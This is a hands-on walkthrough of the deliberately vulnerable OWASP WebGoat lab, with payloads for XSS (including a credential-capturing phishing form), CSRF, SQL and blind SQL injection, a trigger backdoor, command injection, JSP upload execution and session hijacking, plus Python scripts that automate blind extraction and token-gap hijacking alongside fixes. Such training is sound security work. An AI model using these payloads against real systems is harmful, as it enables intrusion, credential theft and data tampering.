WebGoat walkthrough
This is Shubham Choudhary, back with some new and interesting material on cyber security. After a long gap I have prepared a new session on web application penetration testing: a walkthrough of the deliberately vulnerable application WebGoat (the WebGoat 5 build that ships with OWASP Broken Web Applications; the file paths below are from that VM).
WebGoat is a demo vulnerable application designed by OWASP for learning, hands-on, how the web vulnerabilities found in real-life applications are exploited.
There are many blogs covering website vulnerabilities, but most stick to theory, so I decided to give you some practical hands-on experience with these vulnerabilities. It will help you learn and grow in the WAPT field.
General
1. HTTP Basics :- type your user name (the lesson echoes it back reversed) and submit
2. HTTP Splitting :- the value of the language parameter is copied into the Location header of a redirect. Append a CRLF followed by headers and a body of your own, and the browser treats everything after the blank line as a second, attacker-controlled response. Un-encoded, the value sent in the language field is:
en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 31

<html>Perdeu playboy!</html>
Each line break is sent as %0d%0a and the whole value is URL-encoded (spaces as %20). Two things to check: the empty line after "Content-Length: 0" is what terminates the real redirect, and the Content-Length of the injected response should equal the byte length of its body (the body above is 28 bytes, so strictly the header should say 28; adjust it whenever you change the text).
:- Cache poisoning :- the same split response, plus a Last-Modified header far in the future so a cache considers its copy fresh and keeps serving the forged page:
en
Content-Length: 0

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Oct 2222 15:27:28 GMT
Content-Length: 31

<html>Perdeu playboy!</html>
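To see exactly what goes over the wire, here is an added Python example (not part of the original walkthrough or of WebGoat) that builds the split-response text, URL-encodes it as the language parameter and checks the Content-Length of the injected response against its body. The body text and the future Last-Modified date are the ones above; everything else (function names, the parser) is constructed for the example.

```python
import urllib.parse

# Constructed: the body text the walkthrough injects and the future
# Last-Modified date it uses for the cache-poisoning variant.
BODY = "<html>Perdeu playboy!</html>"
FUTURE_DATE = "Mon, 15 Oct 2222 15:27:28 GMT"


def split_payload(body, last_modified=None):
    """Build the un-encoded text that is appended to the language value.

    The first CRLF ends the Location header of the lesson's 302 redirect;
    "Content-Length: 0" plus a blank line closes that response, so the
    browser (or a proxy cache) parses what follows as a second, complete
    response that we control.
    """
    headers = ["HTTP/1.1 200 OK", "Content-Type: text/html"]
    if last_modified is not None:
        # A far-future Last-Modified makes a cache treat the forged page as
        # fresh, so it keeps serving it to everyone (cache poisoning).
        headers.append("Last-Modified: " + last_modified)
    # Content-Length must be the byte length of the body; computing it
    # avoids the off-by-a-few values that creep into hand-written payloads.
    headers.append("Content-Length: %d" % len(body.encode("utf-8")))
    return ("\r\nContent-Length: 0\r\n\r\n"
            + "\r\n".join(headers) + "\r\n\r\n" + body)


def language_param(language, body, last_modified=None):
    """URL-encode the payload so CR/LF travel as %0D%0A in the query string."""
    return language + urllib.parse.quote(split_payload(body, last_modified), safe="")


def injected_response(payload):
    """Parse the second (injected) response the way a naive HTTP parser
    would and return (status line, headers dict, body)."""
    second = payload.split("\r\n\r\n", 1)[1]      # drop the closed redirect
    head, _, body = second.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def content_length_matches(payload):
    """The check to run before sending: declared length == actual body bytes."""
    _, headers, body = injected_response(payload)
    return int(headers["content-length"]) == len(body.encode("utf-8"))


if __name__ == "__main__":
    print(language_param("en", BODY, FUTURE_DATE))
```

Paste the printed value into the language field of the lesson (it is already encoded). If content_length_matches() is false for a payload you edited by hand, fix the header before sending, otherwise the browser waits for bytes that never come.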
Access Control Flaws
1. Using an Access Control Matrix :- user Larry has the Account Manager role
2. Bypass a Path Based Access Control Scheme :- an interesting file to try and obtain might be tomcat/conf/tomcat-users.xml
: Step 1 :- select any file, Inspect Element on the hidden File field and change its value to "../../reportBug.jsp"
: Step 2 :- click View File
LAB: Role Based Access Control
Stage 1: Bypass Business Layer Access Control :- user "Tomcat" pass "tom"
:- Open Burp Suite, start intercepting, click on ViewProfile and change action=ViewProfile to action=DeleteProfile in the intercepted request
Stage 2: Add Business Layer Access Control
(Developer version of WebGoat)
Stage 3: Bypass Data Layer Access Control :- user "Tomcat" pass "tom"
:- Log in as Tomcat, click on SearchStaff, type another user name such as "Larry", click on Find Profile and then EditProfile, change the profile content and click on UpdateProfile
Stage 4: Add Data Layer Access Control
(Developer version of WebGoat)
Remote Admin Access
(Requires the developer version of WebGoat, so I am skipping this)
Ajax Security
1. Same Origin Policy Protection :- click the link for a same origin request (lessons/Ajax/sameOrigin.jsp) and submit; it succeeds. Then click the link for a different origin request (http://www.google.com/search?q=aspect+security); the browser blocks the XMLHttpRequest because the origin differs. Congratulations
2. LAB: DOM-Based Cross-Site Scripting
Stage 1: the name you enter is written into the page as HTML, so an image tag renders. Copy the location of the OWASP logo and paste it into the field as: <IMG SRC="images/logos/owasp.jpg"/>
Stage 2: an image that fails to load runs its error handler; type any alert payload of this kind to complete the stage: <img src=x onerror="alert('any text')">
Stage 3: an iframe with a javascript: URL also executes; use any iframe alert payload: <iframe src=javascript:alert("Hacked!!")></iframe>
Stage 4: copy the fake login form given in the lesson text, paste it into the field and type any password (submit)
Stage 5: the fix is on the server side. Open DOMXSS.js (on the OWASP BWA VM: /owaspbwa/owaspbwa-svn/var/lib/tomcat6/webapps/WebGoat/javascript/DOMXSS.js; the escapeHTML function it needs lives in escape.js in the same directory) and make displayGreeting encode the name before it reaches innerHTML:
function displayGreeting(name) {
    if (name != '') {
        document.getElementById("greeting").innerHTML = "Hello, " + escapeHTML(name) + "!";
    }
}
Save the file, go back to the client side and run any IMG SRC alert payload: it is now displayed as text instead of executing.
3. LAB: Client Side Filtering
Stage 1: the page sends every employee's record to the browser and only hides them with JavaScript. Open the employee drop-down, right-click > Inspect Element, find the hidden row for Bartholomew and read his salary (450000), then submit it
Stage 2: the fix is on the server side. Open /var/lib/tomcat6/webapps/WebGoat/lessons/Ajax/clientSideFiltering.jsp and restrict the XPath query to the employees managed by the logged-in user.
Delete this code from the file:
StringBuffer sb = new StringBuffer();
sb.append("/Employees/Employee/UserID | ");
sb.append("/Employees/Employee/FirstName | ");
sb.append("/Employees/Employee/LastName | ");
sb.append("/Employees/Employee/SSN | ");
sb.append("/Employees/Employee/Salary ");
String expression = sb.toString();
And paste this code instead (the predicate keeps only employees whose Managers list contains the logged-in user's id, userid):
StringBuffer sb = new StringBuffer();
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");
sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");
String expression = sb.toString();
4. DOM Injection :- the Activate button is disabled on the client side only. Inspect Element on it and delete the disabled attribute [disabled=""]; the button becomes clickable
5. XML Injection :- copy your account ID 836239, paste it and submit. Then tick every checkbox, intercept the request, add another checkbox field with a different reward id and forward the request
:Congratulations:
6. JSON Injection :- right-click on $600, Inspect Element, change the price in the hidden field and submit
7. Silent Transactions Attacks :- the transfer is exposed as a JavaScript function, so it can be called without the form. Right-click, Inspect Element, go to the Console and run: javascript:submitData(1234,99999999);
8. Dangerous Use of Eval :- the access code is passed to eval(), so close the string and the call and add a statement of your own. Paste this into the three-digit access code field: 123');alert(document.cookie);('
9. Insecure Client Storage
Stage 1: the coupon codes are stored encrypted in the page's JavaScript, together with the decrypt function. Select all the items in the shopping cart, Inspect Element, go to the Console and run: javascript:alert(decrypt('emph'));
Stage 2: enter the coupon code "GOLD" (or another one), intercept the Purchase request, change the grand total (GRANDTOT) to 0 and forward the request
:Congratulations:
Authentication Flaws
1. Password Strength :- how much time is needed to crack each of these passwords?
password = 123456 : 0 seconds
password = abzfez : 1394 seconds
password = a9z1ez : 5 hours
password = aB8fEz : 2 days
password = z8!E?7 : 41 days
Type these values into the blank fields and press Go (the site the lesson refers you to, https://www.cnlab.ch/codecheck, is not available for this version of WebGoat, so use the numbers above)
2. Forgot Password :- username: admin, favourite colour: green (the recovery question asks for a colour, which is easy to guess)
3. Basic Authentication :- intercept the submit request with Burp Suite and copy the value of the Authorization header. It is "Basic " followed by the base64 of user:password (an encoding, not a hash, so anyone who sees the header has the password). Answer with the header name (Authorization) and the decoded value (guest:guest).
Submit : Congratulations
For the second part, after the congratulations message, put the credentials into the URL, e.g. http://guest:guest@192.168.1.20/WebGoat, and restart the lesson
:COMPLETED:
4. Multi Level Login 2 :- do this lesson after you have completed Multi Level Login 1. Log in as username Joe, password banana, enter the TAN that is requested, intercept the request, change the hidden user name from Joe to Jane and forward the request: the TAN is checked, but the user it is applied to comes from a field you control
5. Multi Level Login 1
Stage 1: log in with username Jane, password tarzan, and enter TAN #1
Stage 2: log in again with the same credentials. When TAN #2 is requested, inspect the hidden field that holds the TAN number and change it from 2 to 1, then submit TAN #1 again: the server trusts the client to say which TAN it is checking
Submit : Congratulations
Buffer Overflows :
Off-by-one Overflows
Step 1: log in with any name and any room number. With the Web Developer add-on, show hidden fields, then type 4096 characters into the Room No field and click Accept; show hidden fields again and the overflowed buffer reveals the VIP guests' names and room numbers
Step 2: choose one of the VIP hotel members and log in with that name and room number
Code Quality:
Discover Clues in the HTML :- press Ctrl+U to view the HTML source and look for developer comments. The FIXME comment (shown in green) leaks the credentials admin:adminpw
Concurrency:
1. Thread Safety Problems :- the lesson keeps the current user in a shared, non-thread-safe variable. Open two browsers, type username "Jeff" in the first and "Dave" in the second and click Submit in both at the same time; one request shows the other's user
Congratulations :
2. Shopping Cart Concurrency Flaws
Step 1: open two browsers; in the first select 1 of the $169 product, in the second select the same product with a high quantity, such as 10
Step 2: in the first browser click "Update Cart" and "Purchase"; while it sits on the confirmation page, in the second browser click "Update Cart" with the higher quantity; then in the first browser click "Confirm". The total was fixed before the quantity changed, so the larger order is confirmed at the lower price
Congratulations :
Cross Site Scripting (XSS)
1. Phishing with XSS :- paste this into the search field and click Search. It renders a fake login form inside the page and, on submit, sends whatever was typed to the catcher URL (replace localhost:8080 with your WebGoat host):
<script>
function hack() {
  alert("Login=" + document.forms[0].user.value + " Password=" + document.forms[0].pass.value);
  XSSImage = new Image;
  XSSImage.src = "http://localhost:8080/WebGoat/catcher" + "?PROPERTY=yes" + "&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;
}
</script>
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br><br><HR>
2. LAB: Cross Site Scripting
Stage 1: Stored XSS :- log in as "Tom Cat" (password "tom"), click ViewProfile, then EditProfile, and paste this script into the Street field:
<script>alert('You\'ve been hacked by Tom');</script>
Click UpdateProfile and log out. Now log in as "Jerry" (password "jerry") and click ViewProfile: the stored script fires in Jerry's browser
Congratulations
Stage 2: Block Stored XSS using Input Validation
(Developer version of WebGoat)
Stage 3: Stored XSS Revisited :- log in as "Bruce McGuirre" (password "bruce") and click ViewProfile
Congratulations
Stage 4: Block Stored XSS using Output Encoding
(Developer version of WebGoat)
Stage 5: Reflected XSS :- log in as "Larry Stooge" (password "larry"), click SearchStaff and search for this script:
<script>alert('vulnerable form');</script>
Congratulations
Stage 6: Block Reflected XSS
(Developer version of WebGoat)
3. Stored XSS Attacks :- type any title, paste this script into the message box and click Submit
Script :- <script>alert('vulnerable form');</script>
4. Reflected XSS Attack :- paste this script into the three-digit access code field
Script :- <script>alert('vulnerable form');</script>
5. Cross Site Request Forgery (CSRF) :- type any title, paste this into the message box and click Submit. When the message is viewed, the browser requests the image URL with the victim's session cookie and the transfer goes through. Take the Screen and menu values from your own lesson URL (they differ per instance; the ones here are from mine)
Script :- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=5000" width="1" height="1" />
6. CSRF Prompt By-Pass :- the transfer now needs a second, confirming request. Type any title, paste this into the message box and click Submit: the first iframe sends the transfer, and its onload handler then loads the confirmation URL into the second frame, so the user never sees the prompt
Script :-
<iframe id="shubh" src="http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=5000" onload="document.getElementById('shubh2').src='http://localhost:8080/WebGoat/attack?Screen=1471017872&menu=900&transferFunds=CONFIRM';"></iframe>
<iframe id="shubh2" frameborder="1" width="800" scrolling="yes" height="300"></iframe>
(Then refresh your page: Congratulations)
7. CSRF Token Bypass :- type any title, paste this into the message box, click Submit and submit the message
Script :- <img src="http://localhost:8080/WebGoat/attack?Screen=13&menu=900&transferFunds=4000&transferFunds=main" width="1" height="1" />
Congratulations
8. HTTP Only Test :- first select "No" and click Read Cookie and Write Cookie: the page's script can read and overwrite the cookie. Then select "Yes" and click both again: with the HttpOnly flag set, the cookie is no longer visible to document.cookie
9. Cross Site Tracing (XST) Attacks :- enter this script into the three-digit security code field and click Purchase. TRACE echoes the request back, headers and cookies included, which is what XST reads (replace http://test.lab/ with your WebGoat URL). Current browsers refuse to send TRACE from XMLHttpRequest, so this only works in the old browser inside the lab VM
Script :-
<script>
var xhr = new XMLHttpRequest();
xhr.open('TRACE', 'http://test.lab/', false);
xhr.send(null);
if (200 == xhr.status)
    alert(xhr.responseText);
</script>
Improper Error Handling
Fail Open Authentication Scheme :- type username "Admin", Inspect Element on the password field and delete the password input altogether, then submit. With the parameter missing, the login code throws an exception and the exception handler lets you in
Congratulations
Injection Flaws
1. Command Injection :- the file name from the drop-down is passed to a shell command, so first we need to get rid of the drop-down to be able to type a value. With the Web Developer add-on use Forms > Convert Select Elements to Text Inputs (or just intercept the request with Burp and edit the parameter), then append a command to the file name, e.g. "& ipconfig" on a Windows host, or "& ifconfig" / "; id" on the Linux OWASP BWA VM
2. Numeric SQL Injection :- select Columbia, intercept the request and replace the numeric station value in the request with an injection such as (101 or 1=1), then forward it: every station's weather data is returned
3. Log Spoofing :- the username is written to the log unchanged, so an encoded CRLF starts a new, forged log line
Part 1: type in the username field: Lim%0d%0aLogin succeeded for username:admin
Part 2: add a script as well, for a log viewer that renders entries as HTML: Lim%0d%0aLogin succeeded for username:admin<script>alert("Admin login sucessful")</script>
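An added Python example (mine, not the walkthrough's or WebGoat's) showing what the Part 1 payload does to a log line, and the fix on the logging side: escape control characters so one submitted value can never become two records. The log line format is an assumption modelled on the lesson's "Login failed for username:" message.

```python
import urllib.parse

# The walkthrough's Part 1 payload as typed into the username field; the
# form sends it URL-encoded and the application decodes it before logging.
PAYLOAD = "Lim%0d%0aLogin succeeded for username:admin"


def decode_field(value):
    """What the server sees after URL-decoding the submitted field."""
    return urllib.parse.unquote(value)


def log_entry_unsafe(username):
    """How the lesson logs a failed login (assumed format): the raw username
    is pasted into the line, so an embedded CR LF starts a second, forged line."""
    return "Login failed for username: " + username


def neutralize(value):
    """Escape CR, LF and every other control character so one submitted
    value can only ever produce one log line."""
    out = []
    for ch in value:
        if ord(ch) < 0x20 or ord(ch) == 0x7f:
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def log_entry_safe(username):
    """Same message, with the username neutralized before it hits the log."""
    return "Login failed for username: " + neutralize(username)


def records(entry):
    """Split an entry the way a log viewer or SIEM does: one record per line."""
    return entry.splitlines()


if __name__ == "__main__":
    user = decode_field(PAYLOAD)
    print(records(log_entry_unsafe(user)))   # two records, the second forged
    print(records(log_entry_safe(user)))     # one record, CRLF visible as \x0d\x0a
```

neutralize() only keeps records intact; the Part 2 payload's script tag is a separate problem that belongs to the viewer, which must HTML-encode entries when it renders them in a browser.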
4. XPath Injection :- type this into the username field (a' or 1=1 or 'a'='a) and anything (hack) into the password field; the predicate becomes always true and every employee's record is returned
Congratulations
5. String SQL Injection :- type this into the Your Last Name field and hit Enter (a' or 1=1 or 'a'='a)
6. LAB: SQL Injection
Stage 1: String SQL Injection :- log in as "Neville" with any password. The password field limits the length on the client side, so intercept the request, replace the password with the string (a' or 1='1) and forward the request
Stage 2: Parameterized Query
(Developer version of WebGoat)
Stage 3: Numeric SQL Injection :- log in as "Larry" with password "larry", intercept the ViewProfile request and replace Larry's employee id with (101 or 1=1 order by salary desc): the first row returned is now the highest-paid employee
Congratulations
Stage 4: Parameterized Query
(Developer version of WebGoat)
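Stages 2 and 4 need the developer build, so here is an added Python/sqlite3 example (mine, not WebGoat's code) of what the fix looks like: the string and numeric lookups written with string concatenation, beside the parameterized versions, run against a constructed user_data table with made-up rows. The payloads are the ones from Stage 1, Stage 3 and lesson 2 above.

```python
import sqlite3

# Constructed stand-in for the lesson's user_data table (made-up rows that
# only resemble WebGoat's data).
ROWS = [
    (101, "Joe", "Snow", "987654321"),
    (102, "John", "Smith", "2234200065411"),
    (103, "Jane", "Plane", "333498703333"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, "
                "last_name TEXT, cc_number TEXT)")
    con.executemany("INSERT INTO user_data VALUES (?, ?, ?, ?)", ROWS)
    return con


def by_last_name_concat(con, last_name):
    """String SQL injection: the input is spliced into the SQL text, so
    a' or 1=1 or 'a'='a  turns the WHERE clause into a tautology."""
    sql = ("SELECT userid, last_name FROM user_data WHERE last_name = '"
           + last_name + "'")
    return con.execute(sql).fetchall()


def by_last_name_param(con, last_name):
    """Parameterized query (the Stage 2 fix): the value is bound by the
    driver and never parsed as SQL, so quotes and OR are just characters."""
    sql = "SELECT userid, last_name FROM user_data WHERE last_name = ?"
    return con.execute(sql, (last_name,)).fetchall()


def profile_concat(con, employee_id):
    """Numeric SQL injection: no quote to break out of, so 101 or 1=1 is
    enough to widen the query to every employee."""
    sql = ("SELECT userid, first_name FROM user_data WHERE userid = "
           + str(employee_id))
    return con.execute(sql).fetchall()


def profile_param(con, employee_id):
    """The Stage 4 fix: coerce to int first (anything that is not a number
    is rejected) and bind it as a parameter."""
    try:
        eid = int(employee_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT userid, first_name FROM user_data WHERE userid = ?"
    return con.execute(sql, (eid,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(by_last_name_concat(db, "a' or 1=1 or 'a'='a"))   # every row
    print(by_last_name_param(db, "a' or 1=1 or 'a'='a"))    # no such last name
    print(profile_concat(db, "101 or 1=1"))                 # every row
    print(profile_param(db, "101 or 1=1"))                  # rejected
```

The int() coercion matters as much as the placeholder: binding "101 or 1=1" as a string parameter would be safe too, but rejecting it up front also stops the request from reaching the database at all.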
7. Modify Data with SQL Injection :- paste this SQL string into "Enter your userid": jsmith';update salaries set salary=100000 where userid='jsmith
8. Add Data with SQL Injection :- paste this SQL string into "Enter your userid": jsmith';insert into salaries values('nome',10);--
9. Database Backdoors
Stage 1: paste this into the userid field (a stacked query; the second statement changes the salary): 101;update salaries set salary=100000 where userid=101
Stage 2: paste this second query, which installs a trigger that rewrites the email of every newly inserted employee: CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid
10. Numeric Blind SQL Injection :- the page only says whether the account number is valid, so every query has to be turned into a yes/no question. Type this SQL string into the Account Number field:
101 AND (SELECT pin FROM pins WHERE cc_number='1111222233334444') = 2364
If the page says the account number is valid, the condition was true and the PIN is 2364. Use < and > first to narrow the range, then = to confirm
11. Blind String SQL Injection :- this lesson is very much like the previous one, but the value is a string, so it is recovered one character at a time
Step 1: use this to confirm that the first letter of the name is "J":
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) = 'J' )
Step 2: repeat for the second letter, using < or > to reduce the range and then = to confirm:
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) = 'i' )
The second letter is "i", so the name is Ji**. If you continue the process you will find the name is "Jill".
Or, automated with Burp Intruder:
101 AND (SELECT ASCII(SUBSTR(name,1,1)) from pins WHERE cc_number=4321432143214321) =$ --
Intercept the request and send it to Intruder with two payload positions (a cluster bomb attack): the first 1 in SUBSTR (the character position, 1 to 5) and $ (the ASCII value, 70 to 120). The responses that say the account is valid give you the character at each position; enter the name found.
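The range-narrowing the two lessons describe by hand is a binary search, and it is worth seeing it run end to end. This is an added Python example (mine, not the walkthrough's or WebGoat's) with a constructed pins table and a stand-in for the page that concatenates the account field into its query and only reports valid/invalid. The probes are the same shape as above (101 AND (subquery) ...); SQLite's unicode() and substr() stand in for ASCII(SUBSTR(...)), and the PIN 2364 and name Jill are the values from the lessons.

```python
import sqlite3


def make_db():
    """Constructed tables; the PIN and the name are the lesson's answers,
    everything else is made up."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user_data (userid INTEGER, first_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe');
        CREATE TABLE pins (cc_number TEXT, pin INTEGER, name TEXT);
        INSERT INTO pins VALUES ('1111222233334444', 2364, 'Joe');
        INSERT INTO pins VALUES ('4321432143214321', 1111, 'Jill');
    """)
    return con


class BlindPage:
    """Models the lesson page: the account-number field is concatenated
    into the query and the only feedback is valid (a row came back) or not."""

    def __init__(self, con):
        self.con = con
        self.requests = 0

    def is_valid(self, account_field):
        self.requests += 1
        sql = "SELECT * FROM user_data WHERE userid = " + account_field
        return len(self.con.execute(sql).fetchall()) > 0


def extract_pin(page, cc, lo=0, hi=9999):
    """Binary search the numeric PIN with > probes: each request halves the
    range, so 10000 possibilities take 14 requests instead of up to 10000."""
    while lo < hi:
        mid = (lo + hi) // 2
        probe = "101 AND (SELECT pin FROM pins WHERE cc_number='%s') > %d" % (cc, mid)
        if page.is_valid(probe):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_name(page, cc, max_len=32):
    """Binary search each character by its code point (SQLite's unicode()
    playing the role of ASCII(SUBSTR(...))), stopping at the first position
    where the string has no character."""
    sub = "(SELECT name FROM pins WHERE cc_number='%s')" % cc
    name = ""
    for pos in range(1, max_len + 1):
        if not page.is_valid("101 AND length(%s) >= %d" % (sub, pos)):
            break
        lo, hi = 32, 126            # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            probe = "101 AND unicode(substr(%s, %d, 1)) > %d" % (sub, pos, mid)
            if page.is_valid(probe):
                lo = mid + 1
            else:
                hi = mid
        name += chr(lo)
    return name


if __name__ == "__main__":
    page = BlindPage(make_db())
    print(extract_pin(page, "1111222233334444"))     # 2364
    print(extract_name(page, "4321432143214321"))    # Jill
    print(page.requests, "requests in total")
```

Against the real lesson the same loop would send each probe through Burp or a requests session and read the valid/invalid text instead of calling is_valid(); comparing on the code point rather than on a quoted character also keeps the apostrophe and backslash out of the probe.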
Denial of Service
Denial of Service from Multiple Logins :- log in with an SQL injection in both the username and the password (1' or 1='1) to list all the users, then log in as any three of them: the extra sessions exhaust the database connection pool
Congratulations
Insecure Configuration
Forced Browsing :- the configuration page is not linked anywhere, so type its URL by hand: change the lesson URL (192.168.1.100/WebGoat/attack?Screen=37&menu=1400&succeeded=yes) to 192.168.1.100/WebGoat/conf and hit Enter
Congratulations
Insecure Storage
Encoding Basics :- enter the string "abc"; the list below shows the encoded value for every scheme. For ROT13 it is nop. Now enter the string "a c" and check the URL encoding: the answer is a+c. Congratulations
Malicious File Execution
Save this code in a file with a .jsp extension and upload it as the image. Tomcat executes it when the uploaded file is requested, so it creates the file the lesson asks for (replace filepath with the directory named in the lesson; on the Linux VM use / rather than \\ in the path):
<HTML>
<%
// replace filepath with the directory the lesson names
java.io.File file = new java.io.File("filepath\\guest.txt");
file.createNewFile();
%>
</HTML>
Then right-click the uploaded image, click Copy Image Location, open it in a new tab (this is what runs the JSP) and refresh the WebGoat page
Congratulations
Parameter Tampering
1. Bypass HTML Field Restrictions
Step 1: Inspect the disabled input field, remove its disabled attribute and type anything
Step 2: intercept the request and change every field to a value the form would not allow, then forward the request. For example, the original
select=foo&radio=foo&checkbox=on&shortinput=12345&disabledinput=kjsdakl&SUBMIT=Submit
becomes
select=foo123&radio=foo123&checkbox=on&shortinput=12345123&disabledinput=kjsdakl123&SUBMIT=Submit123
2. Exploit Hidden Fields :- intercept the request and change the hidden price of the HDTV
3. Exploit Unchecked Email
Step 1: paste an alert script into the comments box (<script>alert('hacked');</script>) and click Send
Step 2: paste another one (<script>alert('hacked2');</script>), click Send, intercept the request, change the recipient from Admin to Guest and forward the request
4. Bypass Client Side JavaScript Validation :- the regular expressions run only in the browser. Intercept the request, change every field to a value the validation would have rejected (the opposite of what it expects) and forward the request
Session Management Flaws
Hijack a Session :- intercept the login request, delete the WEAKID cookie and intercept the response to get a fresh one. Send the WEAKID value to Sequencer, run the analysis and save the tokens to a file. Sort the file: the first part of each token is a sequential counter, so a number missing from your sorted list is a session issued to someone else while you were sampling. The second part is a millisecond timestamp, so send the candidate to Intruder and brute force its last two digits within the gap between the timestamps of the neighbouring tokens
Once done, set the cookie in the browser and refresh the page
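The sort-and-find-the-gap step is easy to get wrong by eye when Sequencer has collected a few hundred tokens, so here is an added Python example (mine, not the walkthrough's or WebGoat's) that does it: it takes a constructed sample of WEAKID values, finds the counters that were never handed to us, and brackets each one's timestamp between its neighbours to produce the exact list of cookies to try. The "<counter>-<millisecond timestamp>" format is assumed from the description above; the sample values are made up.

```python
# Constructed sample of WEAKID cookies, as Burp Sequencer might have
# collected them (deliberately unsorted). Format assumed from the lesson:
# "<sequential counter>-<millisecond timestamp>".
SAMPLE = [
    "18302-1305206620301",
    "18301-1305206620289",
    "18303-1305206620312",
    "18305-1305206620337",
    "18306-1305206620350",
]


def parse_tokens(tokens):
    """Return (counter, timestamp) pairs sorted by counter."""
    pairs = []
    for tok in tokens:
        counter, stamp = tok.split("-", 1)
        pairs.append((int(counter), int(stamp)))
    return sorted(pairs)


def missing_counters(pairs):
    """Counters inside our sampled range that we never received: sessions
    handed to someone else (the victim) while we were collecting."""
    seen = {c for c, _ in pairs}
    return [c for c in range(pairs[0][0], pairs[-1][0]) if c not in seen]


def candidate_cookies(pairs, counter):
    """The victim's timestamp must lie strictly between the timestamps of
    the counters issued just before and just after it, so that gap is the
    whole brute-force space."""
    before = max(t for c, t in pairs if c < counter)
    after = min(t for c, t in pairs if c > counter)
    return ["%d-%d" % (counter, t) for t in range(before + 1, after)]


def hijack_candidates(tokens):
    """Map every missing counter to the cookies worth sending to Intruder."""
    pairs = parse_tokens(tokens)
    return {c: candidate_cookies(pairs, c) for c in missing_counters(pairs)}


if __name__ == "__main__":
    for counter, cookies in hijack_candidates(SAMPLE).items():
        print(counter, len(cookies), "candidates:", cookies[0], "...", cookies[-1])
```

Feed the candidate list to Intruder as a simple list payload for the WEAKID cookie; the number of candidates is exactly the timestamp gap, which is why sampling quickly (small gaps) matters more than sampling a lot.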
Spoof an Authentication Cookie :- log in as the different users provided and compare their AuthCookie values; the cookie is derived from the username, so once you see the pattern, make the cookie for alice, set it in the browser and refresh the page
Session Fixation Attack
Stage 1: (as the attacker) add &SID=whatever to the end of the href in the phishing mail's link, so the victim will log in with a session id you already know
Stage 2: (as the victim) click the Goat Hills Financial link in the mail
Stage 3: log in with username jane and password tarzan; the login is now bound to SID=whatever
Stage 4: (as the attacker) change the SID value in the URL (SID=NOVALIDPASS) to SID=whatever and refresh the page; you are logged in as Jane without her password
Web Services
1. Create a SOAP Request:
Stage 1: how many operations are defined in the WSDL? Right-click the WebGoat WSDL file link, open it in another tab and find the SoapRequest port type:
<wsdl:portType name="SoapRequest">
1. <wsdl:operation name="getFirstName" parameterOrder="id">
<wsdl:input message="impl:getFirstNameRequest" name="getFirstNameRequest"/>
<wsdl:output message="impl:getFirstNameResponse" name="getFirstNameResponse"/>
</wsdl:operation>
2. <wsdl:operation name="getLastName" parameterOrder="id">
<wsdl:input message="impl:getLastNameRequest" name="getLastNameRequest"/>
<wsdl:output message="impl:getLastNameResponse" name="getLastNameResponse"/>
</wsdl:operation>
3. <wsdl:operation name="getCreditCard" parameterOrder="id">
<wsdl:input message="impl:getCreditCardRequest" name="getCreditCardRequest"/>
<wsdl:output message="impl:getCreditCardResponse" name="getCreditCardResponse"/>
</wsdl:operation>
4. <wsdl:operation name="getLoginCount" parameterOrder="id">
<wsdl:input message="impl:getLoginCountRequest" name="getLoginCountRequest"/>
<wsdl:output message="impl:getLoginCountResponse" name="getLoginCountResponse"/>
</wsdl:operation>
</wsdl:portType>
You see 4 operations in SoapRequest (answer = 4)
Stage 2: read the WSDL again for the type of the id parameter; it is "int":
<wsdl:message name="getLastNameRequest">
<wsdl:part name="id" type="xsd:int"/>
</wsdl:message>
Stage 3: press the button to generate the HTTP request
(Not complete)
WSDL Scanning :- open the WSDL file and check all the methods; there is a getCreditCard method that the page never offers. Select an option, intercept the request and change the method name to getCreditCard
Web Service SAX Injection :- the new password is inserted into the SOAP message without encoding. Inject this in the password field; it closes the current changePassword call and opens a second one for user id 102, so the server changes that user's password as well (the remainder of the original message closes the second call):
newpassword</password>
</wsns1:changePassword>
<wsns1:changePassword>
<id xsi:type='xsd:int'>102</id>
<password xsi:type='xsd:string'>notforyoutoknow
Challenge
Stage 1: check the Java source file using this link: http://localhost:8080/WebGoat/source?source=true
Stage 2: intercept the POST request with WebScarab and change the value white to white'or'1'='1
NOTE :- get professional training in web application penetration testing at shubhamchoudharyhacker.com
